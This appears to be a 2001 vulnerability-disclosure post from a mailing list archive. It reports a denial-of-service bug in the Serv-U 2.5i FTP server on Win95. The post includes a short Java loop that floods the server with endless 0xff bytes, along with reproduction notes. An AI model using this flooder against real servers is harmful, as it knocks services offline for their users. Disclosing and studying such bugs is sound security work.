Vulnerability Development mailing list archives
Serv-U 2.5i DoS
From: "Steven, Bates" <Craig () FREENET DE>
Date: Sun, 25 Feb 2001 07:55:29 -0700
Hi,

I think I found another DoS issue in Serv-U 2.5i:

I downloaded the "Fixed" version of Serv-U yesterday. I installed it on one of my PCs and started %windir%\RSRCMTR.EXE to see how many resources are used when I flood it. Then I started to play around with the server:

    Ftp> open server
    Connected to server.
    220 Serv-U FTP-Server v2.5i for WinSock ready...

I coded a little Java application which flooded the server with 0x00 chars, but at least that bug was fixed. So I tried other chars and found out that 0xff was a good choice. The application just sends out 0xff chars in a never-ending loop (I added a Counter to see how many chars are needed to block/crash it).

    char nuke=0xff;
    int Counter=0;
    while(true)
    {
        sout.print(nuke);
        Counter++;
        if(Counter%10000==0) System.out.println(Counter+" 0xff sent");
    }

I started it, and the resources got lower and lower. When about 290000 0xff chars were sent, there was a popup (I am sure every Win9x user saw it once) which said that 90% of the resources were already used, and that some programs should be closed. I tried to click the "OK" button, but the popup did not react. I also noticed that the mouse cursor was moving strangely...

I tried to log in from another PC:

    Ftp>open Server
    Connected to server.
    Connection closed by remote host.

but as you can see, it did not work - the connection closed after the timeout.

Then I stopped the Java application with Ctrl-C, the resource icon became green, the popup disappeared (it finally noticed that I had clicked on it) and the server was working fine again.

While writing this, I was testing the flooder, but after seeing the popup on the screen, I forgot to stop the flooder. When I finally noticed that, I stopped it - it had already sent about 2,5 Million 0xff chars to the server. I tried to connect to the ftpd, but I couldn't - I was connected and immediately(!) disconnected. I tested it again, but this only works sometimes, I have no idea why.
I do not know why the server acts like this, but this issue really should be fixed.

!! THE FLOODER DOES NOT WORK IF THE SERV-U ICON IS JUST IN THE TRAY, YOU NEED TO SEE THE LOGGING SCREEN !!

!! I was only able to reproduce this behaviour on Win95, on Win98 it did not seem to do anything !!

[Craig]
http://www.HaQuarter.De/